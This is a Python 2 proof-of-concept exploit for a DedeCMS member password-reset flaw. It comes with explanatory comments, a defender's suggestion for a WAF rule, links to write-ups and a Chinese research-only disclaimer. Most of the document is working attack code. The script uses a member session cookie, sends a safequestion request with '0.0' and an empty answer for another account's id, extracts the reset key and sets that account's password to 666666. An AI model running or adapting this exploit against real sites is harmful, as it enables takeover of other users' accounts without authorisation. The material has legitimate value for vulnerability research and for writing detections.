poc
# coding=utf-8
# Python 2 proof-of-concept (print statements, str.decode) for the DedeCMS member
# password-reset flaw discussed in the linked write-ups. Reproduced from the page
# with only its layout restored and comments added; the code itself is unchanged.
#
# Request sequence, as written below:
#   1. GET  /member/index.php                     -- confirm the supplied cookie is a live session
#   2. GET  /member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=<num>
#   3. GET  the reset link extracted from step 2's response, and read the hidden
#           `userid` / `key` form fields from it
#   4. POST /member/resetpassword.php  dopost=getpasswd, setp=2, id=<num>, userid, key, pwd, pwdok
#
# Defender's note: in this PoC the session cookie carries DedeUserID=8 while the
# reset requests target id=2, i.e. an account other than the one logged in. A
# web-server or WAF rule that flags /member/resetpassword.php requests whose `id`
# parameter differs from the session's DedeUserID, or whose safequestion/safeanswer
# pair is `0.0` / empty, matches this traffic directly.
import re
import requests
from bs4 import BeautifulSoup

if __name__ == "__main__":
    host = 'http://127.0.0.1/dedecms/'
    # Session cookie of a registered member account (as used by the PoC author).
    cookie = "PHPSESSID=hi7jm3fncr0q79du7tvu3bm406; DedeUserID=8; DedeUserID__ckMd5=7903ea0790a3690a; DedeLoginTime=1515641375; DedeLoginTime__ckMd5=0a847f5adbfcbbd4"
    # Member id whose password the script attempts to change (differs from DedeUserID above).
    num = 2
    headers = {'Cookie': cookie}
    # Step 1: the session is considered valid only if both member-area links appear.
    rs = requests.get(host + '/member/index.php', headers=headers)
    if '/member/myfriend.php' in rs.text and '/member/pm.php' in rs.text:
        print '账号登陆成功'
    else:
        exit('账号登陆失败!')
    # Step 2: the safequestion request that exercises the reported flaw;
    # a rate-limit message ("retry after 10 minutes") aborts the run.
    payload_url1 = "{host}/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id={num}".format(
        host=host, num=num)
    rs = requests.get(payload_url1, headers=headers)
    if '对不起,请10分钟后再重新申请'.decode('utf-8') in rs.text:
        exit('对不起,请10分钟后再重新申请').decode('utf-8')
    # Pull the href of the first anchor out of the response (pattern kept exactly as on the page)
    # and undo HTML entity escaping of '&' in it.
    searchObj = re.search(r'<a href=/'(.*?)/'>', rs.text, re.M | re.I)
    payload_url2 = searchObj.group(1)
    payload_url2 = payload_url2.replace('amp;', '')
    print 'Payload : ' + payload_url2
    # Step 3: follow the extracted link and read the hidden form fields it serves.
    rs = requests.get(payload_url2, headers=headers)
    soup = BeautifulSoup(rs.text, "html.parser")
    userid = soup.find_all(attrs={"name": "userid"})[0]['value']
    key = soup.find_all(attrs={"name": "key"})[0]['value']
    # Step 4: submit the second reset step with a fixed new password (666666).
    data = {'dopost': 'getpasswd', 'setp': 2, 'id': num, 'userid': userid, 'key': key, 'pwd': 666666, 'pwdok': 666666}
    rs = requests.post(host + "/member/resetpassword.php", data=data, headers=headers)
    # Success is judged solely by the presence of the server's confirmation string.
    if '更改密码成功,请牢记新密码'.decode('utf-8') in rs.text:
        print '更改密码成功'.decode('utf-8')
        print '账号:'.decode('utf-8') + userid
        print '密码:'.decode('utf-8') + '666666'
    else:
        print '更改密码失败'.decode('utf-8')
详细利用过程
https://xianzhi.aliyun.com/forum/topic/1926
https://www.0dayhack.com/post-768.html
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。